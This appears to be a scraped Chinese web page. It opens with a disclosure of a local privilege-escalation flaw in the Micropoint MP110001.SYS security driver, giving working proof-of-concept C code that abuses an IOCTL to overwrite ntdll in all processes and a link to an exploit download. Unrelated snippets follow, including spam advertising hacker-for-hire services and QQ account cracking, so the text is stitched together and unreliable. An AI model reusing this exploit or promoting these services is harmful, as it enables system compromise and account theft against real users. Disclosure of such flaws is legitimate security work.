微点主动防御是一款号称使用行为分析技术实时保护的主动防御软件。 其核心驱动MP110001.SYS最新版本存在本地权限提升漏洞,可导致任何权限的用户在本地提升权限到SYSTEM权限,绕过UAC等保护。同时也可以利用此漏洞注入到任何受保护进程,从而穿透防火墙、主动防御软件。 出问题的组件:MP110001.sys,版本号:1.2.10006 CheckSum = 0x00009F60 TimeStamp = 0x43620505 该驱动提供了一个接口,允许RING3程序将一块数据COPY到地址0-0x80000000的任意 地址,在写入时会将寄存器CR0的第16位置0,此时CPU的页保护机制就会失效,WINDOWS NT 的CopyOnWrite机制也将失效,RING3程序可以将内存写入到系统模块,例如kernel32.dll, user32.dll的地址,改写它们的代码,此时对系统DLL代码的改写会在所有进程体内同时生效. 通过这一接口,任何权限的RING3程序就可以HOOK或旁路系统任何进程的函数调用,从而进行权限提升,如果HOOK进主动防御、防火墙等的进程体内,则可绕过主动防御软件的保护。 测试代码:HANDLE hdev = CreateFile("\\\\.\\MP110001" ,FILE_READ_ATTRIBUTES ,FILE_SHARE_READ |FILE_SHARE_WRITE ,0,OPEN_EXISTING ,0,0); if (hdev == INVALID_HANDLE_VALUE){ CHAR xx[100];sprintf(xx , "create err = %u\n" , GetLastError());MessageBox(xx, 0 , 0 );return ;} CHAR xx[] = "hello mp!"; HMODULE p = GetModuleHandle("ntdll.dll"); ULONG btr ; BOOL bret = DeviceIoControl(hdev ,0x220007,(PVOID)((ULONG)p + 2 ),strlen(xx)+1 ,xx,0,&btr ,0); CloseHandle(hdev); 测试代码会向NTDLL.DLL的DOS头第二个字节开始写入一个字符串“hello mp",此修改将在系统任何进程体内生效,可使用OD、WINDBG,WINHEX等工具查看 测试程序下载:http://mj0011.ys168.com 漏洞演示目录下LOCALexp_MP.rar
访问: https://git-scm.com/downloads ,进入git'下载页面,根据个人操作系统下载对应软件版本,默认下载最新版;双击安装即可。选择安装目录和安装内容,如果只是单纯的使用,...
如果我们误删了QQ中的好友,或者删除之后,又想把他加回来,这个时候就可以通过QQ好友找回功能进行恢复了。具体操作步骤请看以下内容: 具体恢复方法步骤如下所示: 1.因为我的QQ目前没有被误删的...
真实黑客联系方式 网络中的红帽子黑客,他们一般被称之为,眼尖黑客,同白帽黑客一样,红毛黑客的领导准则是制止黑帽黑客的进攻,他们的运作方式也是不一样的,如果和黑帽黑客对应上了,他们也会变...
基础黑客教程(windows黑客基础教程)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客、...
一、黑客qq群号免费(黑客能破解qq群匿名么)方法总结 1、黑客能破解一个QQ发匿名悄悄话的人吗?如果能,有谁愿意帮个。可以去入侵腾讯服务器QQ账号有没有黑客会破解/QQ账号有没有黑客会破解会盗号的...
珠三角包括哪些城市?(和非珠三角地区的差距,为什么会如此大?) 广东的发展在我国一直都是名列前茅的,是名副其实的经济强省,连续多年经济总量都稳居我国第一。但即使是经济如此优异的广东省,省内还是存在着...